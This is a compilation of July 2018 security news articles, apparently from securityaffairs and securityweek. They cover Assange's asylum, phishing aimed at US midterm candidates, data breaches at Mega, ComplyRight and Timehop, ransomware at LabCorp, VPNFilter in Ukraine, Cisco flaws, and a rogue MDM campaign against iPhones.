“Sources close to Assange said he himself was not aware of the talks but believed that America was putting ‘significant pressure’ on Ecuador, including threatening to block a loan from the International Monetary Fund (IMF) if he continues to stay at the embassy,” reported RT.

The newly-elected President of Ecuador Lenín Moreno arrived in London on Friday, officially the motivation of his travel is the participation at the Global Disability Summit on 24 July 2018, but media reports suggest he was reaching an agreement with UK government to withdraw the asylum protection of Assange.

“ECUADOR’S PRESIDENT Lenin Moreno traveled to London on Friday for the ostensible purpose of speaking at the 2018 Global Disabilities Summit (Moreno has been using a wheelchair since being shot in a 1998 robbery attempt). The concealed, actual purpose of the President’s trip is to meet with British officials to finalize an agreement under which Ecuador will withdraw its asylum protection of Julian Assange, in place since 2012, eject him from the Ecuadorian Embassy in London, and then hand over the WikiLeaks founder to British authorities.” wrote Glenn Greenwald on the Intercept.

Glenn Greenwald

@ggreenwald
· 20 Jul
The editor-in-chief of RT says the Ecuadorian government - now highly subservient to the west under @Lenin's government - will withdraw its asylum grant to Julian Assange and hand him over to the UK. People pretending to believe in press freedom will cheer if he's sent to the US: https://twitter.com/M_Simonyan/status/1019958571889577985 …

Glenn Greenwald

@ggreenwald
Which is the greater threat to press freedom: (a) sending Julian Assange to the US to be prosecuted by the Sessions DOJ for publishing classified and hacked docs or (b) Donald Trump tweeting mean insults at Chuck Todd and Wolf Blitzer and being rude to Jim Acosta?

6:05 PM - Jul 20, 2018
946
590 people are talking about this
Twitter Ads info and privacy

Glenn Greenwald

@ggreenwald
· 20 Jul
Replying to @ggreenwald
Which is the greater threat to press freedom: (a) sending Julian Assange to the US to be prosecuted by the Sessions DOJ for publishing classified and hacked docs or (b) Donald Trump tweeting mean insults at Chuck Todd and Wolf Blitzer and being rude to Jim Acosta?

Glenn Greenwald

@ggreenwald
The above report that UK & Ecuador are preparing to turn Assange over to UK appears to be true. Big question is whether the US will indict him & seek his extradition, the way Sessions & Pompeo vowed they would. Can't wait to see how many fake press freedom defenders support that.

8:37 PM - Jul 20, 2018
624
503 people are talking about this
Twitter Ads info and privacy
In May 2017, Swedish prosecutors dropped their preliminary investigation into an allegation of rape against Julian Assange, but the Wikileaks founder fears that he would be extradited to the US, where he is facing federal charges his role in the Chelsea Manning‘s case.

Julian Assange

Three months ago, Ecuador blocked Assange from accessing the internet, mainly to avoid that he could express support to Catalonia and its dispute with the Spanish Government for the independence.

According to Ecuador, Assange had violated the agreement to refrain from interfering in other states’ politics.

Which are current charges against Assange in the UK?

The only criminal proceeding against Assange is a pending 2012 arrest warrant for “failure to surrender” that is considered by experts a minor bail violation charge.

This charge carries a prison term of three months and a fine, though it is possible that the time Assange has already spent in prison in the UK could be counted against that sentence.


Microsoft uncovered and stopped attempts to launch spear-phishing attacks on three 2018 congressional candidates
20.7.2018 securityaffairs
Phishing

Microsoft helped the US Government is protecting at least three 2018 midterm election candidates from attacks of Russian cyberspies.
Microsoft revealed that Russian cyberspies attempted to hack at least three 2018 midterm election candidates and it has helped the US government to repeal their attacks.

A Microsoft executive speaking at the Aspen Security Forum revealed the hacking attempts against at least three unnamed congressional candidates, all the attacks were detected this year,

The company executive only added that the three candidates were “people who, because of their positions, might have been interesting targets from an espionage standpoint as well as an election disruption standpoint.”

The hackers sent spear-phishing messages to the candidates, the messages included links to a fake Microsoft website used by the cyberspies to trick victims into providing their credentials.

“Earlier this year, we did discover that a fake Microsoft domain had been established as the landing page for phishing attacks,” said Tom Burt, Microsoft’s vice president for customer security.

“And we saw metadata that suggested those phishing attacks were being directed at three candidates who are all standing for election in the midterm elections.”

Once Microsoft discovered the phishing website it has taken down it and helped the US government to “avoid anybody being infected by that particular attack.”

Microsoft blamed the Russian APT28 group for the attacks.

We “discovered that the [fake domains] were being registered by an activity group that at Microsoft we call Strontium…that’s known as Fancy Bear or APT 28,” Burt explained.

“The consensus of the threat intelligence community right now is [that] we do not see the same level of activity by the Russian activity groups leading into the mid-year elections that we could see when we look back at them at that 2016 elections,”

Microsoft APT28

Burt compared the recent activities with the hacking campaign conducted to interfere with the 2016 Presidential election, he pointed out that differently from 2016 campaigns, 2018 attacks do not target think tanks and academic experts that they did during the 2016 presidential election.

“That does not mean we’re not going to see it, there is a lot of time left before the election.” Burt added.


Thousands of Mega account credentials leaked online, it is credential stuffing
20.7.2018 securityaffairs Incindent

Thousands of account credentials associated with the popular file storage service Mega have been published online,
The former NSA hacker Patrick Wardle, co-founder at Digita Security, discovered in June a text file containing over 15,500 usernames, passwords, and files names.

patrick wardle

@patrickwardle
😢 Found file on VirusTotal w/ 15K+ Mega accounts (user names/passwords & users' file listings)

😥🤬 File listings included files names describing child abuse content

👮🏽‍♂️🚔🌍 International law enforcement actively engaged

🙏🏽 @zackwhittaker for writeup & collaboration! https://twitter.com/zackwhittaker/status/1018997928793464833 …

11:01 AM - Jul 18, 2018
69
32 people are talking about this
Twitter Ads info and privacy
The presence of the files suggests that the threat actors that collected them also accessed to each account and listed its content.

Wardle discovered the file after it was uploaded to the VirusTotal service some months earlier by a user purportedly in Vietnam.

Wardle passed the data to ZDNet that verified the huge trove of data belongs to the Mega service.

ZDNet contacted many users that confirmed the authenticity of the content of the file.

The data appears to date back to 2013, when Kim Dotcom launched the service.

Mega

ZDNet asked the popular expert Troy Hunt, who runs the data breach notification site Have I Been Pwned, to analyze the files.

Hunt believes the hackers collected the credentials from other data breaches (credential stuffing).

98 percent of the addresses in the file had already been included in a previous data breach and listed in the Hunt’ service.

“Some 87 percent of the accounts in the Mega file were found in a massive collection of 2,844 data breaches that he uploaded to the service in February, said Hunt.” read the post published by ZDNet.

“Of those we contacted, five said that they had used the same password on different sites.”

Mega chairman Stephen Hall also confirmed the file is the result of credential stuffing.

Experts noticed the Mega service doesn’t implement two-factor authentication -making it easy for attackers to access an account once it will obtain the credentials from other breaches.

Mega logs the IP address of each user who accesses to an account and some users confirmed to have noticed suspicious logins accessing their account from countries in Eastern Europe, Russia, and South America since the file was uploaded.

“One of the accounts in the file contained file listings for what appeared to describe child abuse content. Given the nature of the account’s content, ZDNet informed the authorities.” continues ZDNet.

The illegal content was uploaded years earlier, suggesting that the account owner has store excluding any recent third-party involvement.

“Mega has zero tolerance for child sexual abuse materials,” said Hall. “Any reports result in links being deactivated immediately, the user’s account closed and the details provided to the authorities.”

“Mega can’t act as censor by examining content as it is encrypted at the user’s device before being transferred to Mega,” he said. “As well as it being technically impossible, it is also practically infeasible for Mega and other major cloud storage providers, with 100s of files being uploaded each second.”


‘IT system issue’ caused cancellation of British Airways cancelled flights at Heathrow
20.7.2018 securityaffairs Security

British Airways canceled flights at Heathrow due to an ‘IT system issue,’ the incident occurred on Wednesday and affected thousands of passengers.
The problem had severe repercussions on the air traffic, many passengers also had their flights delayed.

“On one of the busiest days of the summer, British Airways cancelled dozens of flights to and from Heathrow, affecting at least 7,000 passengers

Problems began for BA when the control tower was closed for around 35 minutes on Wednesday afternoon when a fire alarm was triggered. Landings and take-offs were stopped.” reported the British Independent,

“Then an IT issue emerged which caused further disruption for BA and other airlines. Hundreds of flights were delayed, and some evening outbound departures were canceled. Around 3,000 British Airways passengers were stranded overnight abroad.”
The IT problem affected 7,000 passengers and more than 3,000 were forced to spend the night abroad attempting to fly back to London.

Officially the problem was originated by the IT supplier Amadeus that caused disruption to the flights, below the official statement of British Airways on its Twitter account. Reportedly, the British Airways passengers stranded at the airport were advised to ‘look for overnight accommodation or seek alternative travel arrangements’.

It seems that the IT problems affected also online-check in service of the company.

British Airways

“We are aware that British Airways is currently experiencing an issue which is impacting their ability to provide boarding passes to some passengers. We will be working with the airline to support their efforts to resolve the issue as quickly as possible.” stated a spokesperson for Heathrow.

The problems began a few hours after a fire alarm at Heathrow’s air traffic control tower was triggered causing delays for several airlines. According to the airport, this event is not related to the British Airways issue, while airline glitch has “impacted operation of the airfield for a short while”.

“The vast majority of customers affected by the supplier system issue and the temporary closure of Heathrow airport’s air traffic control tower are now on route to their destinations.”

“The supplier, Amadeus, resolved their system issue last night, and our schedule is now operating as normal.” said a spokesperson for British Airways.”

“We have apologised to our customers for disruption to their travel plans.”

British Airways experienced another technical problem at its IT systems in May 2017.


HR Services Firm ComplyRight Suffers Data Breach
20.7.2018 securityweek Incindent

Florida-based HR services provider ComplyRight revealed recently that its tax reporting platform was involved in a cybersecurity incident that resulted in the exposure of personal information.

ComplyRight learned on May 22 that someone had gained unauthorized access to its web-based tax reporting platform, which is used by various websites to prepare W-2, 1099 and other tax-related forms.

ComplyRight, which is owned by marketing company Taylor Corporation, provides tax solutions through efile4Biz. The efile4Biz website claims its services are used by 76,000 organizations.ComplyRight hacked

However, ComplyRight says the data breach has only impacted less than 10 percent of the individuals whose tax forms have been prepared on its platform.

ComplyRight hacked

An investigation conducted by the company showed that the attacker gained access to the names, addresses, phone numbers, email addresses, and Social Security numbers of individual tax form recipients. However, ComplyRight has not been able to determine whether the compromised information was actually downloaded by the unauthorized party, and says it has not seen any evidence of fraud as a direct result of the incident.

Affected individuals are being notified by mail and offered 12 months of free credit monitoring and identity theft protection services.

Security blogger Brian Krebs reported that some of the recipients of these letters were unaware of ComplyRight. The company clarified that its platform is used by various tax form preparation websites whose customers are impacted by the breach and many may not be familiar with the ComplyRight brand.

According to Krebs, the attackers had access to ComplyRight systems between April 20, 2018 and May 22, 2018.

“Upon learning of the issue, we disabled the platform, remediated the issue on the website, and commenced a prompt and thorough investigation using external cybersecurity professionals to determine who was potentially affected and what information was accessed or viewed,” ComplyRight stated. “Although the investigation determined the information was accessed and/or viewed, it could not confirm if the information was downloaded or otherwise acquired by an unauthorized user.”

ComplyRight is not the only HR services firm hit by a data breach recently. Australia-based PageUp reported last month that hackers may have gained access to names, contact information, usernames, and password hashes. PageUp says it has 2.6 million active users across over 190 countries.


Ransomware Attack Hits Health Firm LabCorp

20.7.2018 securityweek Ransomware

Burlington, North Carolina-based LabCorp took some of its systems offline last weekend after discovering that some had been infected by ransomware.

LabCorp, a company that provides “diagnostic, drug development and technology-enabled solutions for more than 115 million patient encounters per year,” serves hundreds of thousands of customers nationwide and processes tests on more than 2.5 million patient specimens per week.

With revenues that topped $10 billion last year, the health company operates a network of more than 1,900 patient service centers (PSCs) nationally and employs about 60,000 people.

In an 8-K filing with the U.S. Securities and Exchange Commission on Monday, the company revealed that, over the weekend of July 14, it detected suspicious activity on its network and decided to take some systems offline to contain the activity.

“The activity was subsequently determined to be a new variant of ransomware,” the health firm said, responding to a SecurityWeek inquiry on the attack.

“LabCorp promptly took certain systems offline as part of its comprehensive response to contain and remove the ransomware from its system. This has temporarily affected some test processing and customer access to test results,” the company said.

As of Monday, testing operations had been already resumed and the firm was working on bringing additional systems and functions online.

“Work has been ongoing to restore full system functionality as quickly as possible, testing operations have substantially resumed, and we are working to restore additional systems and functions over the next several days,” the company told SecurityWeek.

The ransomware, LabCorp says, only impacted its Diagnostics systems but did not affect Covance Drug Development systems. The health firm also revealed it has “engaged outside security experts and is working with authorities, including law enforcement.”

For the time being, the “investigation has found no evidence of theft or misuse of data,” the company said.


Industry Reactions to U.S. Indicting 12 Russians for DNC Hack
20.7.2018 securityweek BigBrothers

The U.S. last week indicted 12 Russian intelligence officers over their alleged role in a hacking operation targeting the Democratic National Committee (DNC) and Hillary Clinton’s 2016 presidential campaign.

The charges, part of special counsel Robert Mueller’s investigation into Russia’s attempt to interfere in the presidential election, were announced just days before President Donald Trump met his Russian counterpart, Vladimir Putin.

Industry professionals have commented on the charges, their impact, the possible threat actors responsible for the operation, and how these types of attacks can be avoided.

And the feedback begins...

John Hultquist, Director of Intelligence Analysis, FireEye:

“While we had already been aware of much of the information covered in the indictment, there were several interesting insights into the organizations that lie behind the intrusion operators we track. In particular, the document indicates that more than one GRU unit was involved in efforts to undermine the elections. The first of these units, Unit 26165, resembles APT28, the operator who we originally suspected of carrying out the DNC incident. The second of these two units, Unit 74455, is implicated in incidents affecting election systems.

We have been actively tracking an actor we believe was tied to those incidents, and have found some connection between those incidents and others, such as efforts to target the 2017 French elections, and disruptive attacks on the 2018 Olympics, as well as other incidents. Ultimately, though much of their activity remains opaque, we believe GRU organizations have been behind many of the most aggressive incidents in recent memory, including the economically devastating NotPetya attacks and attacks on Ukraine’s grid.”

John Gomez, CEO, Sensato:

“When you consider all that is going on and developing with the Russian hackers, it is important to note that we are very much in the embryonic stages of learning what, specifically, occurred. As more and more comes to light, I suspect we will come to appreciate the high level of sophistication that was employed to carry out the attacks. This attack was planned far in advance. It relied upon the coordination of various assets, including the development of fake personas, the recruitment of cybercriminals, monitoring news feeds, and establishing on-the-ground assets that could be plied for information and intelligence. The attackers timed the attacks to shake confidence and cause confusion.

Although the Russian hackers targeted our government, the real lesson here is that this level of sophistication is not isolated to the Russian hackers identified in the U.S Federal indictment. Rather, we are seeing that other criminal organizations, nation states, and even terrorists are employing the same level of sophistication in their operations. This development with Russia simply highlights what many of us have known all along: Attackers, regardless of motivation, have matured their tactics, techniques, and procedures. They’re innovating at a pace that far outstrips the defenses that most organizations have erected. Even basic attacks, such as phishing, are not the same approaches used a few years ago.

We may be appalled, shocked, and even outraged. Yet, maybe the biggest lesson is that despite all efforts, we failed at protecting one of our most treasured assets--the democratic process. What is more appalling is that many will continue to believe that the adversaries our IT organizations faced just a few years ago are the same adversaries our IT organizations face today. Hopefully, what has occurred with Russia will be a wake-up call, not only at the national level, but within our own organizations. If Russia can manipulate an electoral process, what could they and other, highly focused, well-funded cyber attackers do to our economy, our healthcare organizations, and other critical infrastructure systems like transportation or communications?”

Richard Ford, Chief Scientist, Forcepoint:

“We shouldn’t be distracted by talks of how they did this or why but instead – how will the international community respond to these types of asymmetric attacks that impact the very core of our democratic process? While an indictment is a nice gesture, it has little real consequences beyond drawing yet more attention to the issue.

Cybersecurity knows no borders, and so it is relatively easy for a nation state – or even an enthusiastic group of individuals – to launch attacks from the safety of their own country that can be impactful but carry very little personal risk. How we decide to treat these offensive cyber operations is one of the most pressing questions of our time, and those questions cannot be answered by governments alone. Attacks often involve third-party infrastructure, and vulnerabilities in this infrastructure have to be addressed by those in the commercial world.

It’s time for us as an international community to truly come together and determine not only what constitutes acceptable behavior online at the nation state level, but what checks and balances can be meaningfully put in place to those states that refuse to adhere to these agreed upon practices.”

Ross Rustici, Head of Intelligence Research, Cybereason:

"This further confirms the links already exposed from the indictments related to the social media influence campaigns. The concentrated effort of the Russia state to influence the election is undeniable. The most surprising thing about this is not only the relative ease of the intrusions but the wide spread campaign perpetrated by the GRU. This only serves to reinforce the dramatic changes that the internet has brought to influence operations around world. The ease with which intelligence agencies can have a direct influence in the information age is something that they could only dream of during the Cold War."

Kevin Mitnick, Chief Hacking Officer, KnowBe4:

“After reading the Russian indictment I was surprised to see that the Russians use the same exact methods we use to test our client's security controls. Our security engineers have never failed to get in when we can use social engineering (phishing, etc) during an assessment.

The biggest takeaway was that spearphishing is *still* the easiest way the bad guys get in. Why the DNC didn't use Multi-Factor Authentication is beyond me. I believe it is the lack of security awareness training that made it easy for the Russians to hack our election.”

Leo Taddeo, CISO, Cyxtera:

“The indictment teaches cyber security professionals several important lessons. Many legacy security solutions, even when used in combination, simply aren’t designed to mitigate the risks presented by today's adversaries.

A user-Centric, context-aware model is non-negotiable – Access controls that require only user name and password are effectively useless. Given the seemingly unstoppable effectiveness of spearphishing, enterprises must assume that one or more of their users has had their credentials compromised. An effective security solution must do more than just verify a user name and password. It must be be able to tell if the context of a remote connection is suspicious, such as if it originates from an unusual location or time of day, or from a device with no antivirus software installed. It should also be able to ask for additional authentication steps like one-time passwords (OTP), adjust user permissions on the fly and ultimately block access according to the level of risk. To accomplish this, organizations must adopt a user-centric context-aware model that is built on the principle of least privilege.

Authenticate first, connect second – The indictment specifically calls out that the conspirators conducted scanning on the network IP protocols. The fundamental reason for this vulnerability is that TCP/IP – which was originally designed to operate in an environment where the user community knew and trusted each other – is based on implicit trust, with a “connect first, authenticate second” approach. In today’s hyperconnected and highly adversarial threat landscape, this approach puts organizations at risk. Alternate access control technologies, such as Software-Defined Perimeter (SDP), are built on an “authenticate first, connect second” approach ensure that only authorized users can connect to network resources. This reduces the attack surface and significantly improves security. With Software Defined Perimeter, all resources are invisible to the dangerous reconnaissance techniques outlined in the indictment.

Manage the risks of third-party access – The indictment reveals the conspirators hacked into the DNC’s computers through their access to the DCCC network. Then, they installed and managed different types of malware to explore the DNC network and steal documents. This highlights the need for organizations to better manage the risks of third-party access. By using a solution that leverages the Software-Defined Perimeter (SDP) security framework, organizations can ensure that all endpoints attempting to access a given infrastructure are authenticated and authorized prior to accessing any resources on the network. This not only applies the principle of least privilege to the network, it also reduces the attack surface area by hiding network resources from unauthorized or unauthenticated users.”


Robocalling Firm Exposes U.S. Voter Records
20.7.2018 securityweek BigBrothers

A publicly accessible Amazon Web Services S3 bucket belonging to a political autodial firm was exposing hundreds of thousands of United States voter records.

Discovered by Kromtech Security's Bob Diachenko, the misconfigured data repository is part of robocalling company Robocent’s cloud storage and has been already indexed by searchable database GrayhatWarfare, which currently lists over 48,000 open S3 buckets.

Virginia Beach-based political autodial firm claims to have over 10 years of combined autodial experience and to be able to “reach thousands of voters instantly.”

“Our powerful dialer can make thousands of calls a minute, ensuring large calls always meet the deadline,” Robocent notes on its website.

The company’s publicly accessible storage had 2594 listed files that included audio files with pre-recorded political messages for robocalls dials (*.mp3, *.wav).

More importantly, the Amazon S3 bucket contained a large amount of voter data (in the form of *.csv, *.xls files): full name, suffix, prefix; phone numbers (cell and landlines); address with house, street, city, state, zip, precinct; age and birth year; and gender.

Other voter information found in the cloud storage included affiliation provided by state, or inferred based on voting trends/history; jurisdiction breakdown based on district, zip code, precinct, county, state; and demographics based on ethnicity, language, and education, Diachenko reveals.

Many of the files in the S3 bucket were aggregated from outside data firms such as NationalBuilder.

In addition to making political robocalls starting at 1¢ per dial, Robcent also provides voter data at only 3¢ per record. The company also advertises on its website the data points it collects.

“We provide voter files for every need, whether it be for a new robocall or simply to update records for door knocking. Our simple request process allows users to choose exactly who to target with no minimum order,” Robocent says on its website.

According to Diachenko, the company quickly secured the S3 bucket and files access after being responsibly alerted on the issue.

“We're a small shop (I'm the only developer) so keeping track of everything can be tough,” Diachenko was told.

Over the past several years, there were numerous incidents involving voter databases, including one reported by Diachenko in December last year, where an improperly secured MongoDB database exposed the information of the entire voting population of California: it contained 19,264,123 records.


Cisco fixes critical and high severity flaws in Policy Suite and SD-WAN products
19.7.2018 securityaffairs
Vulnerebility

Cisco has found over a dozen critical and high severity vulnerabilities in its Policy Suite, SD-WAN, WebEx and Nexus products.
The tech giant has reported customers four critical vulnerabilities affecting the Policy Suite.

The flaws tracked as CVE-2018-0374, CVE-2018-0375, CVE-2018-0376, and CVE-2018-0377 have been discovered during internal testing.

Two of these flaws could be exploited by a remote unauthenticated attacker to access the Policy Builder interface and the Open Systems Gateway initiative (OSGi) interface.

The access to the Policy Builder interface could allow an attacker to change to existing repositories and create new ones, while the access to the OSGi interface could allow an attacker to access or change any file accessible by the OSGi process.

An unauthenticated attacker could also allow an attacker to modify any data contained in the Policy Builder database.

“A vulnerability in the Policy Builder database of Cisco Policy Suite could allow an unauthenticated, remote attacker to connect directly to the Policy Builder database.” reads the security advisory published by Cisco.

“The vulnerability is due to a lack of authentication. An attacker could exploit this vulnerability by connecting directly to the Policy Builder database. A successful exploit could allow the attacker to access and change any data in the Policy Builder database.”

Cisco also warned of the presence of the Cluster Manager in Policy Suite of a root account with default and static credentials. A remote attacker can exploit the vulnerabilities to access to the account and execute arbitrary commands with root privileges.

Cisco also warned of the presence of seven flaws in the SD-WAN solution, one of them affects the Zero Touch Provisioning service and could be exploited by an unauthenticated attacker to trigger denial-of-service (DoS) condition.

Other SD-WAN vulnerabilities could allow an authenticated attacker to overwrite arbitrary files on the underlying operating system, and execute arbitrary commands with vmanage or root privileges.

Cisco also reported a high severity DoS vulnerability that affects Nexus 9000 series Fabric switches, the issue resides in the implementation of the DHCPv6 feature.

Cisco fixed all the vulnerabilities and confirmed that none of them has been exploited in attacks in the wild.


Timehop provides additional details on the recent security breach

19.7.2018 securityaffairs Incindent

Timehop has recently announced to have suffered a data breach that affected 21 million user accounts. The company now shares additional details about the incident.
Timehop service aims to help people in finding new ways to connect with each other by analyzing past activities, earlier this month, the company revealed that one or more malicious hackers gained unauthorized access to a database storing usernames, phone numbers, email addresses, and social media access tokens for all users.

The security breach also exposed access tokens used by Timehop to access other social networks such as Twitter, Facebook, and Instagram. The tokens have been quickly revoked and currently don’t work.

Wednesday the company provided an update on the incident adding that further info was exposed, including dates of birth, genders, and country codes.

timehop

“Earlier reports of “up to 21 million emails” were correct. However we now provide the following breakdown of Personally Identifiable Information (PII) that was breached, and the combinations contained in records” reads the update provided by the company.

TYPE OF PERSONAL DATA COMBINATION # OF BREACHED RECORDS # OF BREACHED GDPR RECORDS
Name, email, phone, DOB 3.3 million 174,000
Name, email address, phone 3.4 million 181,000
Name, email address, DOB 13.6 million 2.2 million
Name, phone number, DOB 3.6 million 189,000
Name and email address 18.6 million 2.9 million
Name and phone number 3.7 million 198,000
Name and DOB 14.8 million 2.5 million
Name total 20.4 million 3.8 million
DOB total 15.5 million 2.6 million
Email addresses total 18.6 million 2.9 million
Gender designation total 9.2 million 2.6 million
Phone numbers total 4.9 million 243,000
The company provided a detailed analysis of exposed info, specifically for the affected PII records in compliance with the introduced GDPR.

According to the company, hackers first breached into its systems on December 19, 2017, using an employee’s credentials for the company’s cloud computing environment.

The attackers accessed the systems through an IP address in the Netherlands.

In a first phase, the hacker conducted a reconnaissance, at the time the compromised environment had not stored any personal information. In early April, the company moved personal information to the compromised database and the attackers found it only on June 22.

On July 4, the hacker exfiltrated the data and changed its password. The activity was noticed by the company in nearly 24 hours.

“They did not immediately suspect a security incident for two reasons that in retrospect are learning moments,” reads the technical analysis published by Timehop. “First, because it was a holiday and no engineers were in the office, he considered it likely that another engineer had been doing maintenance and changed the password. Second, password anomalies of a similar nature had been observed in past outage. He made the decision that the event would be examined the next day, when engineers returned to the office.”


Facebook faces £500,000 fine in the U.K. over Cambridge Analytica scandal

19.7.2018 securityaffairs Social

Facebook has been fined £500,000 ($664,000) in the U.K. for its conduct in the Cambridge Analytica privacy scandal.
Facebook has been fined £500,000 in the U.K., the maximum fine allowed by the UK’s Data Protection Act 1998, for failing to protect users’ personal information.

Facebook- Cambridge Analytica

Political consultancy firm Cambridge Analytica improperly collected data of 87 million Facebook users and misused it.

“Today’s progress report gives details of some of the organisations and individuals under investigation, as well as enforcement actions so far.

This includes the ICO’s intention to fine Facebook a maximum £500,000 for two breaches of the Data Protection Act 1998.” reads the announcement published by the UK Information Commissioner’s Office.

“Facebook, with Cambridge Analytica, has been the focus of the investigation since February when evidence emerged that an app had been used to harvest the data of 50 million Facebook users across the world. This is now estimated at 87 million.

The ICO’s investigation concluded that Facebook contravened the law by failing to safeguard people’s information. It also found that the company failed to be transparent about how people’s data was harvested by others.”

This is the first possible financial punishment that Facebook is facing for the Cambridge Analytica scandal.

“A significant finding of the ICO investigation is the conclusion that Facebook has not been sufficiently transparent to enable users to understand how and why they might be targeted by a political party or campaign,” reads ICO’s report.

Obviously, the financial penalty is negligible compared to the gains of the giant of social networks, but it is a strong message to all the company that must properly manage users’ personal information in compliance with the new General Data Protection Regulation (GDPR).

What would have happened if the regulation had already been in force at the time of disclosure?

According to the GDPR, the penalties allowed under the new privacy regulation are much greater, fines could reach up to 4% of the global turnover, that in case of Facebook are estimated at $1.9 billion.

“Facebook has failed to provide the kind of protections they are required to under the Data Protection Act.” Elizabeth Denham, the UK’s Information Commissioner said. “People cannot have control over their own data if they don’t know or understand how it is being used. That’s why greater and genuine transparency about the use of data analytics is vital.”

Facebook still has a chance to respond to the ICO’s Notice of Intent before a final decision on the fine is made.

“In line with our approach, we have served Facebook with a Notice setting
out the detail of our areas of concern and invited their representations on
these and any action we propose. ” concludes the ICO update on the investigation published today by Information Commissioner Elizabeth Denham.

“Their representations are due later this month, and we have taken no final view on the merits of the case at this time. We will consider carefully any representations Facebook may wish to make before finalising our views,”


Ukraine ‘s SBU Security Service reportedly stopped VPNFilter attack at chlorine station
19.7.2018 securityaffairs CyberWar

Ukraine ‘s SBU Security Service reportedly stopped VPNFilter attack at chlorine station, the malware infected the network equipment in the facility that supplies water treatment and sewage plants.
According to the Interfax-Ukraine media outlet, the VPNFilter hit the LLC Aulska station in Auly (Dnipropetrovsk region), according to the experts the malware aimed at disrupting operations at the chlorine station.

“Specialists of the cyber security service established minutes after [the incident] that the enterprise’s process control system and system for detecting signs of emergencies had deliberately been infected by the VPNFilter computer virus originating from Russia. The continuation of the cyber attack could have led to a breakdown in technological processes and a possible accident,” the SBU said on its Facebook page on Wednesday.

VPNFilter is a multi-stage, modular strain of malware that has a wide range of capabilities for both cyber espionage and sabotage purpose.

According to the experts at Fortinet that analyzed the malware, VPNFilter operates in the following three stages:

Stage 1 implements a persistence mechanism and redundancy; it allows the malware to survive a reboot.
Stage 2 includes data exfiltration, command execution, file collection, and device management. Only in some versions it is present a self-destruct module.
Stage 3 includes multiple modules that perform different tasks. At the time researchers identified only three modules:
A packet sniffer for traffic analysis and potential data exfiltration.
The monitoring of MODBUS SCADA protocols.
Communication with obfuscated addresses via TOR
The main concerns are for a self-destruct mode that could cause severe damages across all infected devices simultaneously, a feature that could potentially result in widespread Internet outage over a targeted geographic region.

Technical analysis of the code revealed many similarities with another nation-state malware, the BlackEnergy malware that was specifically designed to target ISC-SCADA systems and attributed to Russian threat actors.

Another similarity is the geographic distribution of the infections, both BlackEnergy and VPNFilter infected a large number of devices in Ukraine.

VPNFilter malware

According to the experts, many infected devices have been discovered in Ukraine, and their number in the country continues to increase. On May 8, Talos researchers observed a spike in VPNFilter infection activity, most infections in Ukraine and the majority of compromised devices contacted a separate stage 2 C2 infrastructure at the IP 46.151.209[.]33.

The experts discovered the VPNFilter malware had infected devices manufactured by Linksys, MikroTik, Netgear, QNAP, and TP-Link.

At the time of first discovery, the US Justice Department seized a domain used as part of the command and control infrastructure, its press release explicitly referred the Russian APT groups (APT28, Pawn Storm, Sandworm, Fancy Bear and the Sofacy Group) as the operators behind the huge botnet,

“The Justice Department today announced an effort to disrupt a global botnet of hundreds of thousands of infected home and office (SOHO) routers and other networked devices under the control of a group of actors known as the “Sofacy Group” (also known as “apt28,” “sandworm,” “x-agent,” “pawn storm,” “fancy bear” and “sednit”),” reads the press release published by the DoJ.

“The SBU said its agents together with a telecoms provider and workers of the station managed to prevent a potential man-made disaster, adding Russia special forces were behind cyber attacks with the same virus on the public and private sectors in May 2018.” concluded the Interfax-Ukraine.


Spambot aims at targets WordPress sites in World Cup-Themed spam scam
19.7.2018 securityaffairs
Spam

Imperva observed a spambot targeting WordPress sites aimed at tricking victims into clicking on links to sites offering betting services on FIFA World Cup
Security experts from Imperva recently observed a spike in spam activity directed at WordPress websites, attackers aimed at tricking victims into clicking on links to sites offering betting services on the 2018 FIFA World Cup games.
Imperva monitored the activity of a botnet used to spread meaningless text messages generated from a template to comments sections in blogs, news articles, and other web sites that allow people to comment.

“Turns out the attack was launched by a botnet and implemented in the form of comment SPAM – meaningless, generic text generated from a template and posted in the comment sections of blogs, news articles etc; linking to pay-per-click commercial or suspicious sites looking to scam you or phish for your passwords.” reads the report published Imperva.

The spambot was used to post comments to the same Uniform Resource Identifier (URI) across different WordPress sites indiscriminately and without regard for whether the site is has a comments section or is affected by exploitable known issues.

The comments are generated starting from this template that is known since at least 2013. The template allows to automatically create slightly different versions of the same message to use in spam campaigns.

“Our analysis found that the top 10 links advertised by the botnet lead to World Cup betting sites. Interestingly, eight of the top advertised sites contained links to the same betting site, hinting that they might be connected in a way.” continues Imperva.

World Cup betting sites

“We found that the botnet advertised over 1000 unique URLs, most of them appear multiple times. In many cases, the botnet used different techniques such as URL redirection and URL-shortening services to mask the true destination of the advertised link.”

According to the experts, the spambot is still small, it is composed of just 1,200 unique IPs with up to 700 daily unique IPs. The experts discovered that botnet has also been using URL-shortening, URL redirection, and other techniques to masquerade the landing sites of advertised links in its spam messages.

In the weeks before the World Cup, the spambot was being used in remote code execution attacks and other non-SPAM attacks on WordPress sites

Spambot World Cup

Just after the beginning of the 2018 World Cup, the botnet activity was focused on comment spam, a circumstance that suggests the malicious infrastructure is available for hire.

“A possible explanation is that the botnet is for hire. The malicious activity we’ve seen at first was either paid for or simply the botnet’s attempt to grow itself. Then, it was hired by these betting sites to advertise them and increase their SEO.” continues the analysis.

Comment spam is a well-known activity in the threat landscape, the most common countermeasure it to blacklist IPs originating spams messages and also the URLs that they advertise.

WordPress also has several Plug-ins that cuold defeat this boring activity.

“Although comment SPAM has been with us for more than a decade — and doesn’t seem like it’s going away anytime soon — there are numerous solutions ranging from dedicated plugins that block comments that look SPAMmy, to WAF services.” concluded Imperva.


Mobile Malware Campaign targets users in India through rogue MDM service
19.7.2018 securityaffairs
Virus

Talos Team have uncovered a “highly targeted” campaign leveraging a mobile malware distributed through a bogus MDM service
Security experts from Talos Team have uncovered a “highly targeted” campaign leveraging a mobile malware that has been active at least since August 2015. The researchers believe that cyberspies are operating from China and they found spying on 13 selected iPhones in the same country.

Attackers were abusing a mobile device management (MDM) service that normally allows large enterprises to control devices being used by the employees and enforce policies.

The access to the MDM service used by a company could allow an attacker to control employees’ devices and deploy malware and the targeted devices.

bogus MDM service

“Cisco Talos has identified a highly targeted campaign against 13 iPhones which appears to be focused on India. The attacker deployed an open-source mobile device management (MDM) system to control enrolled devices.” reads the analysis published by Cisco Talos.

“At this time, we don’t know how the attacker managed to enroll the targeted devices. Enrollment could be done through physical access to the devices, or most likely by using social engineering to entice a user to register”

hack-iphone-using-mdm-server
To enroll an iOS device into the MDM service requires a user to manually install enterprise development certificate. Enterprises can obtain such kind of certificates through the Apple Developer Enterprise Program.

